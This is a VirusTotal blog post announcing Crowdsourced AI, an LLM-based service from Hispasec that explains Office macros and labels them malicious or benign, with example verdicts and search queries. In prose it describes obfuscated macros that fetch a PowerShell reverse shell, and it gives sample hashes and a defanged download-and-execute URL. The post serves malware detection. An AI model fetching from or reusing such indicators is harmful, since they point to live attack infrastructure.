VirusTotal += Crowdsourced AI

We are pleased to announce the launch of Crowdsourced AI, a new initiative from VirusTotal, dedicated to leveraging the power of AI in tandem with community contributions. Spearheading this endeavor, Hispasec brings to the table an AI solution designed to analyze Microsoft document formats, particularly those containing macros, such as Word, Excel, and PowerPoint files. We extend a warm invitation to all interested parties to join this effort and explore innovative ways to contribute features that will strengthen the cybersecurity community.

About three months ago, we rolled out Code Insight, an AI tool geared to help security analysts better understand unfamiliar code snippets with explanations in natural language. In a more recent Q&A, we put out a call to anyone keen to lend their own AI models or use cases to VirusTotal to benefit the community. Now, Hispasec has stepped in and added a powerful solution for Microsoft Office documents. They’re using a different AI model not only to explain the macros but also to deliver judgements about any potential malicious content, boosting VirusTotal capabilities.

In the words of the company:
“We are incorporating a specialized AI component from our Content Disarm & Reconstruction (CDR) solution, DeepClean, into VirusTotal. This component leverages a Large Language Model (LLM) to interpret and explain the code within macros in specific Microsoft document formats. Additionally, it offers a verdict—based on the model’s criteria—on whether the analyzed content can be considered malicious or benign. It’s important to emphasize that this is just one facet of DeepClean. Our broader solution recreates files into clean versions, eliminating executable code while preserving the essential content.”

This new integration not only bolsters our AI-driven security analysis but also exemplifies the strength in diversity, mirroring our existing initiatives like Crowdsourced IDS, Sigma, and YARA rules. In line with VirusTotal’s mission, we openly welcome various complementary solutions, reaffirming our commitment to a collaborative defense strategy against cyber threats.

Let’s dive into a few examples showcasing how this new crowdsourced AI section and the contributions from Hispasec perform and are displayed within VirusTotal.

In the example below, we see the verdict label “malicious” at the beginning of the explanation, emphasized in red for easy visibility. This is followed by a detailed description of how macros within this .XLS file employ various obfuscation techniques. These include base64 encoded strings and the concatenation of variables with diverse names, in an attempt to disguise their behavior. However, the model deobfuscates these measures, revealing the true intent of the macros. It turns out they are attempting to download a script containing a PowerShell reverse shell and subsequently execute it.

7d86b9e20b3c115afd2f02bd3bfc1eae754a7b4c37d5155990cc3267d67df56e

In this other example, the model labels a file as “benign”, with the verdict distinctly emphasized in green at the start of the detailed explanation. The report delves into the functionality of the various macros found within the file and their objectives.

24f05da105834088c604c0a2bd4987f092ad3d743d86b7200d835a61e490bc28

Search with Crowdsourced AI results

All the data generated by contributors in Crowdsourced AI is indexed and readily accessible via VirusTotal Intelligence. This means that analysts can now utilize this resource to perform targeted searches, streamlining their investigative processes. For a focused search by verdict, simply input “crowdsourced_ai_verdict:” followed by either “malicious” or “benign”. If you’re looking to search within the explanations provided by the AI, use the “crowdsourced_ai_analysis:” parameter followed by the specific text you’re interested in.

To illustrate the practical application of these search parameters, let’s walk through a scenario an analyst might encounter. Suppose you have received an alert from your SIEM pointing to the IP address 192.168.45.239. You want to find out if there is any document associated with this particular IP.

The search query “crowdsourced_ai_analysis:192.168.45.239” yields a .DOC file linked with the IP address.

Clicking on the search-returned sample, we can read the AI description and find the macro within the .DOC file uses the CreateProcess function to run an obfuscated PowerShell command. Decoding the base64 string reveals that this command downloads and executes a script from ‘hxxp://192.168.45.239/run.txt’.

5a1cad5a9e9be128aa4436540450b17b6716cb64711894078435266106870e6a

Join Crowdsourced AI

At VirusTotal, our commitment to facilitating collaboration within the security community is unwavering. This extends beyond merely integrating AI models and use cases into our platform. We’re also more than willing to supply datasets, comprising samples and metadata, to assist in training innovative security solutions.

If you’re utilizing an AI model or have identified a potential use case that can enhance our collective security posture, we eagerly invite your contribution. Our goal isn’t confined to file and code analysis models; we are open to any use case applicable within the VirusTotal ecosystem. This includes, but is not limited to, solutions addressing status and dynamic analysis explanation, metadata extraction, summarization and evaluation, applications related to domain names, URLs, IP addresses, and tackling various forms of cyber threats such as phishing and other sophisticated attacks.

By broadening our scope and welcoming diverse solutions, we aim to transform VirusTotal into a central hub for superior AI models and use cases across all aspects of the security domain. In doing so, we strengthen our community’s defenses and augment our capacity to counter a wide spectrum of cyber threats.

Thank you for being a part of the security community and supporting collective efforts to improve threat detection and response.

Read more: VirusTotal += Crowdsourced AI

Story added 18. July 2023, content source with full text you can find at link above.